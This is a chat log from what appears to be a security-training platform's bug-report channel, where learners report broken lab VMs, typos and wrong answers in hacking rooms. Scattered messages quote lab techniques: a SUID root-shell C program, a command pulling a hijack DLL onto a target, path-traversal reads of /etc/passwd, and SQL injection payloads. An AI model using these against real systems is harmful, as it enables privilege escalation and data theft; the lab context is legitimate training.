#room-bugs

1 messages · Page 26 of 1

dense garnet
#

Does it give compilation instructions too?

rapid hawk
#

Yes

#

Lol

dense garnet
#

Oof

#

You done f’ed up

rapid hawk
#

I didn't mess anything up lol. I followed it exactly

dense garnet
#

I think it’s probably an arch mixup

#

Run uname -a on both machines

#

And make sure both are x64_86

#

Or both aren’t

rapid hawk
#

Nope

#

I got it

#

Finally

#

Jesus christ

#

The directions are wrong

#

It's says to compile with gcc -c FILENAME.c -o exploit -w

#

Removing the -c flag makes it work

#

No wait

#

Nvm

#

I have confirmed I'm blind

#

I read the instructions wrong fir the last hour

#

Disregard my rant

dense garnet
#

It good now?

rapid hawk
#

Yep. Like I said. I'm blind

#

😂😂

dense garnet
#

Ight great

tropic flameBOT
bitter root
#

Hi, in the room "IDOR", the website is trying to say that "IDs" is the same as "IDS - Intrusion Detection Systems" and gives an explanation of that. Not really a bug but a bit misleading for new ppl:

dusky junco
livid escarpBOT
#

Gave +1 Rep to @bitter root

gritty mason
#

In the LinPrivesc room Task7 Privilege Escalation: SUID, the split view guacamole server seems to be down and tries to reconnect over and over. I think I tried Task8 and had the same issue so I am not sure if more of the tasks have this problem or if its a local issue for me

#

It may be the remote desktop after the guacamole, its just erroring before connecting

dusky junco
#

Hello hello

#

would you mind posting a screenshot please? @gritty mason

#

I'm pretty sure I know what stage of the connection that is resulting in the error but I'd just like to confirm if that's okay?

gritty mason
#

let me give it a shot

dusky junco
#

Thanks. I'm trying to recreate this now myself

gritty mason
#

Thanks Ben

dusky junco
#

Thanks for that, I know the issue. I've forwarded it on to appropriate party

gritty mason
#

np, i think some of the other tasks in that room may be affected as well

#

i think i tried the task after that and then switched to a different room

dusky junco
#

Coolio, this is being fixed rn

gritty mason
#

Cheers

dusky junco
# gritty mason Cheers

Hello hello, this fix has been applied to all VMs in the linprivesc AND the windows priv esc (namely you'll notice that the timer has increased)

gritty mason
dusky junco
#

😎 💪

#

fastest keyboards in the west

gritty mason
#

i have unfortunate news, i tried again and noticed the timer was much longer but its still looping on connect after launch :/

dusky junco
#

oh no 😦 I tested task 7 and it connected okay for me with the fix

gritty mason
#

i dont need to be connected to openvpn for the split to work right

#

i think i tried both ways

dusky junco
#

Nope

#

that error usually just means "wait a bit longer and refresh" waiting another minute or two and refreshing the page usually fixes it

#

unless it's a bit of an obsecure issue

gritty mason
#

im going to terminate and hard refresh and wait a few mins

dusky junco
#

sure thanks

gritty mason
#

if it still doesnt load ill just come back to that one later

dusky junco
#

are you trying task 7 still on lin priv esc?

gritty mason
#

yeah the SUID one

dusky junco
#

okay bare with I'll do some more testing

gritty mason
#

no problem, thanks for helping, appreciated

#

i have it loading one more time here its got about a minute left to go

#

that is not at all what i tried to type lollllll

#

i have no idea how that appeared

#

im leaving it though

dusky junco
gritty mason
#

that gif gets better with each loop im glad i accidented it

#

what i was trying to type was that its still looping here and i probably could have used ssh on openvpn but i was being lazy to use split and now im pot committed

gritty mason
livid escarpBOT
#

Gave +1 Rep to @dusky junco

wheat fractal
#

On the IDOR room, task 7, on the last sentence it says IDs is the same as IDS - Intrusion Detection System
Not a bug per say but still can be misleading

sonic willow
#

yeah the keywords are case insensitive, which is a site bug i guess so maybe plop that in #site-bugs

wheat fractal
#

Alright

rapid hawk
#

https://tryhackme.com/room/winprivesc

Task 5
Finding DLL vulnerabilities
The task says that you could install the software on your own system to test for DLL vulns, but that it could give inaccurate results due to different system configurations. Then it turns around 2 sentences later and says that since procmon requires admin privs, you'll have to install the software on your own system.

Not necessarily a room breaking bug, or a bug at all. I just found it funny that it goes out of its way to tell you that installing the software on your own system can be inaccurate, only to tell you to do exactly that 2 sentences later.

eager quartz
pseudo canyon
#

linprivesc > Privilege Escalation: PATH > What is the odd path in PATH? anyone face this problem ? there's no path has /4/4/ (4 characters) !!!

rapid hawk
#

The question is wrong

pseudo canyon
#

thank u

#

this is what i think

rapid hawk
#

So, another bug, this one is in task 5 of the windows privesc room.

So, Windows Defender is turned on, on the target machine, and sometimes it stops the dll hijacking exploit from working

hazy tiger
#

Room URL: https://tryhackme.com/room/fileinc
JR Penetration Tester -> Introduction to Web Hacking -> File Inclusion -> Local File Inclusion - LFI#2

Typo: include(langauges/THM.php);
Change: include(languages/THM.php);

( @dusky junco )

dusky junco
hazy tiger
dusky junco
#

oh whoops

#

I didn't say what task this is

#

my brain conked out LMAO

hazy tiger
#

Oh I don’t know

dusky junco
#

the irony

hazy tiger
#

I can’t open the room

#

Looks like something called LFI#2

#

I reworded the email I was sent

dusky junco
#

How come you can't see it ?

hazy tiger
#

It was a little hard to understand ngl

hazy tiger
ornate anchor
#

Room URL: https://tryhackme.com/room/linprivesc
JR Penetration Tester -> Privilege Escalation -> Linux PrivEsc -> Task 6 Privilege Escalation: Sudo -> first question

Typo: the user "user"
Change: the user "karen"

I'm new here. There doesn't appear to be a user "user" on that box though. Gave the answer for karen and it worked.

obsidian kiln
hazy tiger
#

It's on my alt vent

#

And I don't have the time to switch accounts rn

#

Inbox is full

obsidian kiln
#

Use your alt to check the room smh

hazy tiger
#

People need answering

#

I'm doing this for the people!

white grotto
#

The Task 5 - DLL Hijacking In the "Windows Privesc room" of the "Jr pentester path" has Win Defender still activated and removing the payloads we create (as shown in the task). Is this normal (I dont think it is) ?

eternal summit
#

cc @glad badger this has been reported a couple times now

glad badger
eternal summit
glad badger
#

Would be nice if Discord had a Save for Later option so I can save these issues into one channel for later. 😄

#

How to migrate 100,000 people to Slack 😂

eternal summit
rain rapids
#

i found a bug for the walking an application room for the last question of task 3 i was able to locate what i believe the flag to be but its refusing it

glad badger
glad badger
# white grotto

Try using (in PowerShell) wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll on the target, instead of using certutil

sonic willow
#

this works client side sure, but server side would still be a problem so this is still vulnerable

obsidian kiln
#

Wait, what?

#

@dusky junco that may need clarified, mate 😆
Not sure if you meant it to be vulnerable and that's just not made clear, or if you meant that as an example of a sanitised function

#

Because, uh, it really isn't 😆

#

Those also really should be code blocks rather than screenshots

sonic willow
#

the paragraph below that is checking server side, so maybe they should be combined to say something like client-side verification can be done with this method (pattern=x), however that's not enough because an attacker could intercept the request to bypass client-side controls. For this reason we also need to verify the input is a number server-side with this method (filter_input)

teal basalt
#

But isn't the input a string?
Like 10.10.10.10, these dots are being filtered by the set pattern
EDIT: these aren't filtered out automatically, only an information popup is shown by the browser that your input isn't valid

eternal summit
#

@teal basalt No, not removed.
Just prevents submission

teal basalt
#

Ok👍
I haven't seen that room yet😅

eternal summit
#

If you don't understand something, that's what the docs are for

teal basalt
#

Oh thank you
Actually, I had a similar check in one of my web application lately, and there I filtered out the input using oninput event😅
I will correct my earlier post

sonic willow
#

even if it was removing everything except that pattern, you can still bypass it by not even using the client

proud kernel
#

I have the same issue

sonic willow
#

room: https://tryhackme.com/room/sqlinjectionlm
task: 3

i think this section is formatted in a really confusing way. currently a section (in red) has either the "description text" above, below or above and below the table, which makes it confusing when reading about the next section

#

i would suggest for each section:

  • what does the query do (for example, The first query type we'll learn is the SELECT query used to retrieve data from the database. )
  • the query (for example, select * from users;)
  • the table showing the results
  • the explanation of the retrieved results (for example, The first-word SELECT tells the database we want to retrieve some data, the * tells the database we want to receive back all columns from the table. For example, the table may contain three columns (id, username and password). "from users" tells the database we want to retrieve the data from the table named users. Finally, the semicolon at the end tells the database that this is the end of the query. )
  • <hr> to have a separator between each section
#

i edited the html to show sort of what i mean

crude token
#

On Cross-site scripting in Introduction to Web Hacking. Is this a known bug?

#

Oh I just saw it is

crude token
midnight junco
#

hey for the network services 2 room, seclists doesn't seem to be installed in the kali attackbox, and when I try to install it I just get "unable to locate package seclists." Is this a known issue, user error, or something new?

midnight junco
#

don't think apt is case sensitive, but could be wrong

#

regardless, no dice there

rapid hawk
#

Hm. Weird. Try updating first?

midnight junco
#

already did

rapid hawk
#

Huh

#

I'm out of ideas then

dense garnet
#

Try git cloning

midnight junco
#

I can, but this is about learning metasploit, will installing via git mess up the metasploit integration?

midnight junco
rapid hawk
#

You'll just have ti change the path

dense garnet
#

I think it’s there

midnight junco
dense garnet
#

No, I though it maybe there

#

Just git clone it, it’ll be the easiest

midnight junco
#

already did, but the documentation is pretty sparse, This is not seeming like a starting path room given the deviations from the instructions

dense garnet
#

Rooms aren’t always super accurate for attackbox and kali

midnight junco
#

I've already tried multiple other rooms to try and understand metasploit, and overall it's creating a very frustrating user experience.

#

The starting path just seems to assume familiarity, or links to rooms that get very esoteric very quickly

lucid oasis
#

I've fixed this locally, and it will be live sometime today. Thanks for reporting and for giving easy reproduction steps.

livid escarpBOT
#

Gave +1 Rep to @raven turtle

wheat fractal
#

Noob question here. I am attempting to get root access on the Linux PrivEsc room - task 11.

Here is the code I am compiling with gcc.

int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}

After, I compile it with "gcc nfs.c -o nfs -w" and then use "chmod +s nfs" as the directions specify.

Next, going into the victim computer and using "./nfs" opens a new shell, but the shell remains as "karen".

#

Is this a bug?

wheat fractal
midnight junco
#

I was kinda assuming at some point for the more challenging stuff it would make sense to have a dedicated box, so I did that already and tested it out as a proof of concept. But for now I'll keep going with the self destructive vm flashcards 😉

rapid hawk
wheat fractal
rapid hawk
#

Huh. That is weird.

wheat fractal
#

Yeah - here is what I am seeing.

#

-rwsr-sr-x 1 kali kali 16088 Oct 22 21:54 exploit
-rw-r--r-- 1 kali kali 74 Oct 22 21:54 exploit.c

#

so it has the SUID bit

#

when I go to the other machine, the file is there and i see this

#

-rwsr-sr-x 1 ubuntu ubuntu 16088 Oct 23 01:54 exploit
-rw-r--r-- 1 ubuntu ubuntu 74 Oct 23 01:54 exploit.c

rapid hawk
#

Did you compile it as root?

#

Because the file should be owned by root for it to work

wheat fractal
#

i did not add "sudo" in front of gcc

rapid hawk
#

There's your problem

wheat fractal
#

it worked!

rapid hawk
#

SUID keeps the file perms if the file owner. If the file is owned by root it is run as root. Since that file is owned by kali, or a low level user, nothing will change when you execute it as another low level user

wheat fractal
#

wow. big learning moment.

#

thank you. such a basic concept and yet I didn't think about it.

rapid hawk
#

No problem.

obsidian kiln
#

If the program drops privileges then there's not a lot you can do about it

wheat fractal
#

excellent advice. thank you both.

rapid hawk
proud kernel
wild bramble
#

hi

wild bramble
#

same room task 6

#

could the code be in a code block pls :p

spring plume
#

LinPrivEscSUID machine didn't start why?

#

I tried to run it multiple times but the issue remains

wild bramble
#

same happened with me so i tried sshing

dusky oriole
#

room/meterpreter
the links in task 2 are both broken. the text is correct. the hrefs are incorrect

spring plume
livid escarpBOT
#

Gave +1 Rep to @wild bramble

rapid hawk
#

@gleaming shadow

wheat fractal
#

anyone noticed that the dig output in nslookup and dig in passiv recon is missing?! xD

#

so much for dig shows more info ^^

sonic willow
#

for whoever’s fixing the above, it’s because of the angle brackets in dig output, < and > need to be &lt; and &gt;

livid glade
#

corp room broken

#

windows button, search function doesn't work. can't access powershell normally

obsidian kiln
dusky junco
#

Only convert the output/terminal text that you want to be displayed and not the entire snippet itself

#

i.e. this is what happens without it

#

convert

#

see the output that is no longer interpreted (:

obsidian kiln
dusky junco
#

i've always had issues with encoding the whole lot and certain things not rendering rigfht

obsidian kiln
#

(Means there are no compatibility issues with rendering engines)

#

Huh, that's strange

dusky junco
#

especially languages like XML

obsidian kiln
#

It's worked fine for me, although I can imagine XML potentially being a bit funky with it given it's basically HTML with no rules

dusky junco
#

I'd encode the whole thing (XML + the HTML snippet) and it'd encode the entire lot

#

only encode the XML and not the HTML snippet == success

#

very strange 😄

obsidian kiln
#

Wait, you're encoding the terminal block as well?

#

I was just meaning to encode the stuff you were putting in the terminal block

dusky junco
#

not to get it working

#

yeah

#

that

#

It was only when I was doing that it worked

obsidian kiln
#

Like here, for example:

#

I encoded this as HTML (all of it):

           

PS C:\Windows\system32> \\tsclient\share\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #```
dusky junco
#

Ah yea yeah

obsidian kiln
#
&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x0a;&#x0a;&#x50;&#x53;&#x20;&#x43;&#x3a;&#x5c;&#x57;&#x69;&#x6e;&#x64;&#x6f;&#x77;&#x73;&#x5c;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x33;&#x32;&#x3e;&#x20;&#x5c;&#x5c;&#x74;&#x73;&#x63;&#x6c;&#x69;&#x65;&#x6e;&#x74;&#x5c;&#x73;&#x68;&#x61;&#x72;&#x65;&#x5c;&#x78;&#x36;&#x34;&#x5c;&#x6d;&#x69;&#x6d;&#x69;&#x6b;&#x61;&#x74;&#x7a;&#x2e;&#x65;&#x78;&#x65;&#x0a;&#x0a;&#x20;&#x20;&#x2e;&#x23;&#x23;&#x23;&#x23;&#x23;&#x2e;&#x20;&#x20;&#x20;&#x6d;&#x69;&#x6d;&#x69;&#x6b;&#x61;&#x74;&#x7a;&#x20;&#x32;&#x2e;&#x32;&#x2e;&#x30;&#x20;&#x28;&#x78;&#x36;&#x34;&#x29;&#x20;&#x23;&#x31;&#x39;&#x30;&#x34;&#x31;&#x20;&#x41;&#x75;&#x67;&#x20;&#x31;&#x30;&#x20;&#x32;&#x30;&#x32;&#x31;&#x20;&#x31;&#x37;&#x3a;&#x31;&#x39;&#x3a;&#x35;&#x33;&#x0a;&#x20;&#x2e;&#x23;&#x23;&#x20;&#x5e;&#x20;&#x23;&#x23;&#x2e;&#x20;&#x20;&#x22;&#x41;&#x20;&#x4c;&#x61;&#x20;&#x56;&#x69;&#x65;&#x2c;&#x20;&#x41;&#x20;&#x4c;&#x27;&#x41;&#x6d;&#x6f;&#x75;&#x72;&#x22;&#x20;&#x2d;&#x20;&#x28;&#x6f;&#x65;&#x2e;&#x65;&#x6f;&#x29;&#x0a;&#x20;&#x23;&#x23;&#x20;&#x2f;&#x20;&#x5c;&#x20;&#x23;&#x23;&#x20;&#x20;&#x2f;&#x2a;&#x2a;&#x2a;&#x20;&#x42;&#x65;&#x6e;&#x6a;&#x61;&#x6d;&#x69;&#x6e;&#x20;&#x44;&#x45;&#x4c;&#x50;&#x59;&#x20;&#x60;&#x67;&#x65;&#x6e;&#x74;&#x69;&#x6c;&#x6b;&#x69;&#x77;&#x69;&#x60;&#x20;&#x28;&#x20;&#x62;&#x65;&#x6e;&#x6a;&#x61;&#x6d;&#x69;&#x6e;&#x40;&#x67;&#x65;&#x6e;&#x74;&#x69;&#x6c;&#x6b;&#x69;&#x77;&#x69;&#x2e;&#x63;&#x6f;&#x6d;&#x20;&#x29;&#x0a;&#x20;&#x23;&#x23;&#x20;&#x5c;&#x20;&#x2f;&#x20;&#x23;&#x23;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3e;&#x20;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x62;&#x6c;&#x6f;&#x67;&#x2e;&#x67;&#x65;&#x6e;&#x74;&#x69;&#x6c;&#x6b;&#x69;&#x77;&#x69;&#x2e;&#x63;&#x6f;&#x6d;&#x2f;&#x6d;&#x69;&#x6d;&#x69;&#x6b;&#x61;&#x74;&#x7a;&#x0a;&#x20;&#x27;&#x23;&#x23;&#x20;&#x76;&#x20;&#x23;&#x23;&#x27;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x56;&#x69;&#x6e;&#x63;&#x65;&#x6e;&#x74;&#x20;&#x4c;&#x45;&#x20;&#x54;&#x4f;&#x55;&#x58;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x28;&#x20;&#x76;&#x69;&#x6e;&#x63;&#x65;&#x6e;&#x74;&#x2e;&#x6c;&#x65;&#x74;&#x6f;&#x75;&#x78;&#x40;&#x67;&#x6d;&#x61;&#x69;&#x6c;&#x2e;&#x63;&#x6f;&#x6d;&#x20;&#x29;&#x0a;&#x20;&#x20;&#x27;&#x23;&#x23;&#x23;&#x23;&#x23;&#x27;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3e;&#x20;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x70;&#x69;&#x6e;&#x67;&#x63;&#x61;&#x73;&#x74;&#x6c;&#x65;&#x2e;&#x63;&#x6f;&#x6d;&#x20;&#x2f;&#x20;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6d;&#x79;&#x73;&#x6d;&#x61;&#x72;&#x74;&#x6c;&#x6f;&#x67;&#x6f;&#x6e;&#x2e;&#x63;&#x6f;&#x6d;&#x20;&#x2a;&#x2a;&#x2a;&#x2f;&#x0a;&#x0a;&#x6d;&#x69;&#x6d;&#x69;&#x6b;&#x61;&#x74;&#x7a;&#x20;&#x23;&#x0a;&#x0a;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;
#

Like, turned it into that

#

Then refreshed the page

#

That's how I do it for all of them 🤷‍♂️

dusky junco
#

I thought by all of it / everything you meant all of it including the terminal container and gubbins

obsidian kiln
#

Oh lord no 😆
Yeah, that would not end well

wheat fractal
#

heyy, is there some bug in SQL Injection room from that new path? I am in Time based SQLi, and when I am querying, I get positive response only when querying for '_%' etc. For example, databased name was confirmed to be 9 times underscore, what is not a case here... I guessed a database name based on example query, and the user, and now I an on a password guessing, but it fails all queries except underscores. Edit: I did that, after reloading the machine I was capable to obtain password, but something is still wrong because the env does not respond properly for an example query referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- or even if I query its full name.

young geyser
#

Hi all, in the room FILE INCLUSION > Task 4 > Question 1, my answer is correct but its not getting accepted.

#

Please check

#

Answer: /lab1.php?file=/etc/passwd

obtuse musk
dusky junco
#

Ooh I need to remove that room from that definition

#

That is intentionally private for the time being 👀

#

@obtuse musk :^

river timber
#

Hi there. Certainly very minor but I thought I would point it out. In the Cross-site Scripting room (under Jr. Penetration Tester), the very first paragraph of Task 1 says, “However, none of the examples is overly complicated”. I believe the ‘is’ should be ‘are’ in that sentence. Again, minor, but wanted to pass it along anyway.

snow badger
#

https://tryhackme.com/room/burpsuiteintruder task 5 question 3, Sniper is good for attacks where we are only attacking a single parameter, aye or nay? Answers is aye, but imho this should be "nay"? The examples given are two params username and password, so maybe I'm misunderstanding what is meant by param in this case

eternal summit
versed yoke
#

Room: File Inclusion
Task 1: Introduction

Issue: The image says that get.php is the file name but is it really? I'd say the last bit in the image (i.e. userCV.pdf) is the file name.

eternal summit
versed yoke
snow badger
eternal summit
#

Is that not what's being done there?

snow badger
#

username=§pentester§&password=§Expl01ted§ thats 2 params

#

sniper most likely would be used in username=pentester&password=§Expl01ted§ mode

obsidian kiln
snow badger
#

@obsidian kiln that is a good point, but I probably would first show with a single param, then with both and then explain that due to this behaviour its best suited for a single position attack(unless I'm missing use-cases for multiple positions)

obsidian kiln
#

It's quite literally in view from the last question 😆

snow badger
#

but it doesn't give a proper reason @obsidian kiln it says before that

#

Notice how Intruder starts with the first position (username) and tries each of our payloads, then moves to the second position and tries the same payloads again. We can calculate the number of requests that Intruder Sniper will make as requests = numberOfWords * numberOfPositions.

obsidian kiln
# snow badger but it doesn't give a proper reason <@!650476435269484549> it says before that

That was written with the assumption that people would be able to understand the implications of an attack type that iterates through positions, especially given the example.
Regardless, whilst sniper is good for single parameter attacks (which is what the question is asking) it is not only used for single parameter attacks. It's not even necessarily designed for single parameter attacks -- it just lends itself to them

#

Failing to cover a multi-parameter attack with sniper would be failing to properly cover the functionality of the tool

#

The full functionality of the attack type is demonstrated, with each request shown. If you can't extrapolate the implications, or see the uses from that 🤷‍♂️
Also the reason why the webapp basic understanding rooms come first

eternal summit
#

In tickets2, it still says Lucky title in the FAQ

dusky junco
livid escarpBOT
#

Gave +1 Rep to @eternal summit

versed yoke
#

Room: File Inclusion
Task 4: Local File Inclusion - LFI
Question: Give Lab #1 a try to read /etc/passwd. What would the request URI be?

Issue: the accepted answer is /lab1.php?file=/etc/passwd but this URI actually doesn't result in being able to read /etc/passwd in Lab 1 because of errors visible in the attached screenshot.

What does work is the following URI: /lab1.php?file=/../../../etc/passwd but this one is not accepted as a valid answer. So as a user I was basically able to read /etc/passwd using this path but it wasn't accepted as a valid answer so I'd say it's currently confusing to the user.

#

Adding a screenshot of the second mentioned URI that does display etc/passwd but isn't accepted as a valid answer to the question.

sonic willow
#

it looks like you entered in the input box /lab1.php?file=/etc/passwd when you should only be entering /etc/passwd

versed yoke
#

I'm so confused right now. Why would even /etc/passwd alone work if the current path is listed as /var/www/html? I thought the directory needs to be moved up first. 😮

sonic willow
#

i'm not connected atm so i can't check sorry :( but i came to my conclusion because of this in the error

snow badger
#

lab 1 shows that the php code is

<?PHP 
    include($_GET["lang"]);
?>
#

in this case they just replace lang with file, so it includes anything in the file param, you can either input /etc/passwd into the box and it works or modify the URL to have it

#

on a different topic, in the burp lab when you login as admin there is a flag, is that used somewhere or was just missed as part of "CSRF Token Bypass" exercise?

modern night
#

Room: Linus PrivEsc (from new Jr penetration test, https://tryhackme.com/room/linprivesc)
Task 6
Issue:
The task is all about leveraging LD_PRELOAD, but when ssh'ing into the machine and using sudo -l the env_keep seems not to be availabe as shown in the pic

#

Well cant upload picture but if you follow the steps you can reproduce it

snow badger
obsidian kiln
#

Think of it as an easter egg 🤷‍♂️

stray fossil
#

room "Common Linux Privesc", Task 6.
/etc/passwd/
if insert string without Group ID (GID) counted as correct

eternal summit
#

Yeah, that's answer tolerance

small wigeon
#

room: NMAP live host discovery (JR penetration)
the view site option opens up a subnet diagram but if you try to send a packet, it doesnt work. Is this happening for everyone?

light mantle
#

Room: https://tryhackme.com/room/xssgi

For any reason, by using the payload given at task 8 and port 1111 or 5555 (probably others <9000 as well), i received my own cookie.
By using port 9999, i managed to get the staff cookie.

Happened the same using the request catcher, attack box and my own kali machine.

#

idk if its a bug or its like that on purpose but i see no logic in it.

glad badger
#

Try to reestablish the connection, or terminate the deployed instance of the target machine and redeploy it. 🙂 Hopefully that will help you.

river timber
#

Found a small grammar issue in “SQL Injections - Task 5”. As shown below, the “it’s we’ve” should most likely be just “we’ve” for the sentence to make sense. Hope that helps.

glad badger
livid escarpBOT
#

Gave +1 Rep to @river timber

river timber
snow badger
vast pilot
vast pilot
echo shoal
#

linuxprivesc task 11 is bugged as well

#

cant really exploit it.

#

tried multiple payloads

#

The nfs task

#

if anyone has been able to do it can you dm?

echo shoal
#

yep

eternal summit
#

Ask there if you want to check with other people please

#

Post here with a demonstration of the bug if it's actually bugged

echo shoal
#

ugh my bad

#

task 11

#

okay will send it

snow badger
vast pilot
#

I tried a few boxes and it wouldn’t start for me. Just hung on “starting”

vast pilot
snow badger
vast pilot
tropic karma
#

Might be just me, but I appear to be having some issues with the Linux Priv Escalation room. More specifically, I have been attempting Task 6 (sudo) and Task 7 (SUID) rooms. When launching the machine, I will always get a connection error with the machine trying to restart every 15 seconds. I can ssh into the machine via my Attack Box. However, in task 6, I do not see a LD_PRELOAD variable and in task 7 I am not able to nano /etc/shadow. Am I doing something wrong?

snow badger
snow badger
livid escarpBOT
#

Gave +1 Rep to @snow badger

zinc dust
#

hello there, "Nmap Live Host Discovery" room, task 2 (Subnetworks) shows broadcast traffic being sent back to the source host, which is wrong. Switches forward broadcast to all ports but the one they receive packet from

#

also task4, "packet that computer1 received before being able to send the ping" should be "arp reply" not "arp response". Ofc this is a response but the message is called "arp reply" 🙂

rapid hawk
#

you can almost always write to /tmp

chilly talon
#

For room: https://tryhackme.com/room/xssgi

On the final challenge, I've set the payload and I can get the cookie if I select the ticket (which I know my cookie isn't the answer) but it states to "wait up to a minute" and after multiple resets of the box I'm still having to wait 5-10 minutes with no cookie from the staff

dense garnet
#

I got annoyed by this aswell

#

Try using the requests catcher

raw bison
#

https://tryhackme.com/room/protocolsandservers task 6. We are connected on the POP3 port. But the 2nd question is asking about "How many email messages are available to download via IMAP". Isn't it meant to ask about "How many email messages are available to download via POP3"? IMAP will be in the next task.

sonic willow
snow badger
brisk yew
#

i can't have my hacker role

misty cave
#

Currently doing the https://tryhackme.com/room/burpsuiteom room and the last question in Section 6 is

"Compare the two responses by word. How many differences does Comparer detect in total?" the correct answer is ||9|| but when i compare i get an answer of 8. I think this is down to a potential difference in the time field, which may throw users off. If you send both requests within a minute of each other you have 1 less difference.

I've also just spotted there's a double space between the words "responses" and "by" in the question. Wouldn't have noticed except it took me a moment.

obsidian kiln
misty cave
obsidian kiln
#

I just did it inside of a minute and got 9

misty cave
#

There's 2 off screen sections of difference in the cookie

obsidian kiln
#

The time field is identical for both?

#

Oh, wait. Tf

#

One sec

misty cave
#

i did one, then another 6 minutes later, so two compares

obsidian kiln
#

Well, I just got 7, so that's unstable

#

Will rework it

misty cave
#

a possible suggestion would be words of difference in the Set-Cookie field?

obsidian kiln
#

Hm?

#

The cookies won't consistently be in the same format unfortunately

misty cave
#

aaah, that's fair then, i was trying to think what difference you're trying to highlight using the question, I guess it's based off the location and maybe redirect url? I'll leave you to it though, it's my bedtime 🙂

obsidian kiln
#

All I wanna do is get them to try it 😆

misty cave
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

untold mural
#

I havent shared a link or finished any of the path rooms and may have spammed "click to redeem" a few times, but cba making another account to test it

versed yoke
#

Room: Passive Reconnaissance
Task 6: Shodan.io

Issue: question 3 asks about the 3rd most common port used for nginx. According to Shodan, this has now changed and the accepted answer on THM is outdated. The currently accepted answer is 8888 which is on #9 spot on Shodan; the third most common port is currently 5000. Screenshot as proof.

strong kelp
#

Execute the command from Example 7. Instead of the string Policy search for PowerShell. What is the name of the 3rd log provider?

#

Execute the command from Example 8. Use Microsoft-Windows-PowerShell as the log provider. How many event ids are displayed for this event provider?

#

The 2 questions above says to look into example 7 and 8, but in the documentation the examples i have to use are for the examples 8 and 9.

obtuse musk
#

Hi there 🙂
In the holo live https://tryhackme.com/room/hololive, task 31, the hyperlink address to given file has changed.
It should be:
https://github.com/BC-SECURITY/Empire/blob/master/empire/server/common/bypasses.py

GitHub

Empire is a PowerShell and Python 3.x post-exploitation framework. - Empire/bypasses.py at master · BC-SECURITY/Empire

deft elm
#

IDOR Room Task 7 the deploy machine is not working

twin tapir
#

stop changing repo structure

calm laurel
#

Hey guys not sure where to post this but noticed a typo/grammer issue in Linux Fundamentals room part 2 task 3 "introduction to flags and switches" the last sentence in the first part says "...contents in the screenshots below are only examples and are not those of those the instance that you deploy in this room."

white ember
#

Burp suite room task 9 last question answer should be "a' or 1=1--" without the quotes, but when I click the submit button nothing happens.

eternal summit
white ember
#

No

#

I guess I could try it from my home PC? I usually do THM from work, that's when I have the most time to do it lol

eternal summit
#

So it might be being blocked by some software running on your work PC or work network

#

Considering it's an SQL injection payload

obsidian kiln
sonic willow
#

should it not be deleted/archived now then

lost crest
#

Hello. I am having issues with the Walking an Application room, Task 3, 3rd question; What is the directory listing flag? I believe I found it "THM{CHANGE_DEFAULT_CREDENTIALS}, but it will not accept that answer. I have answered the other (3) questions in this task, and this is the last one.

#

I just realized I may have put a Q/A out there, and I am sorry if I was NOT supposed to....my bad.

#

I don't even know if I am in the right room now, but this feels like a bug since its the last of (4) questions and it won't accept the answer. If I am in the wrong place I would appreciate if someone would guide me to the correct room. Thank you.

stuck stirrup
livid escarpBOT
#

Gave +1 Rep to @versed yoke

stuck stirrup
# strong kelp In https://tryhackme.com/room/windowseventlogs task 4

looks like there was a commit to add an additional example to the doc -- https://github.com/MicrosoftDocs/PowerShell-Docs/commit/13c15ad7d853f512106e0a977daa93c9dc2812e9#diff-33e7acf7f8356bf18c72c3f3524ed6f6360cd166b13536143712cea76f8d5767. I'll let the creator know. thanks for reporting this.

GitHub

I couldn't quickly find a good resource on how to figure the log's settings, so I've inserted a new ...

livid escarpBOT
#

Gave +1 Rep to @strong kelp

stuck stirrup
livid escarpBOT
#

Gave +1 Rep to @calm laurel

split mulch
#

I guess this is a bug? Something wrong with a script?

#

Room is called Steel Mountain

tidal abyss
#

Looks like instead of the actual script you downloaded some HTML response?

#

I am guessing you did wget on the link in the room which is a link to the github, not directly the "raw" script

split mulch
#

Just checked, you are right, my mistake 😄

#

Thanks

spare lichen
#

Hello all 👋
I've got a lots of bugs on my throwback lab, is it possible to contact a modo or something ?

obsidian kiln
#

@twin tapir

#

Oh

#

-unmute @twin tapir

livid escarpBOT
#

🔊 Unmuted Cryillic#0078

wheat fractal
#

Protocols and Servers: POP3 second question seems to be in the wrong task

twin tapir
thin sleet
#

Not sure if this belongs here or if anyone cares but found a typo in the Jr Penetration Tester path > Introduction to Web Hacking > SQL Injection > Task 2

obsidian kiln
#

Fixed 🙂

dusky junco
#

Damn it Muiri I was literally hovering over "Save"

dusky junco
#

hah! in your face Muiri 😄 I got the ping off lmao!

obsidian kiln
#

Oi. I fixed that one 🤣

dusky junco
#

🤣

half scarab
#

In Room linprivesc task 8
the flag permission is read by everyone instead of only by root.

wheat fractal
#

JR Pentester Path:
Local File Inclusion 2 Lab 3:
Looks like there is a bug in THM since it accepts the wrong answer. Even if you missed the %00 at the end, you are right.

eternal summit
tacit shadow
#

There is a question like so :
What is the name of the option that disables root squashing?

I think to prevent root squashing we should use root_squash in the /etc/exports file

But according to the room the answer it's no_root_squash 🤔

obsidian kiln
iron orchid
#

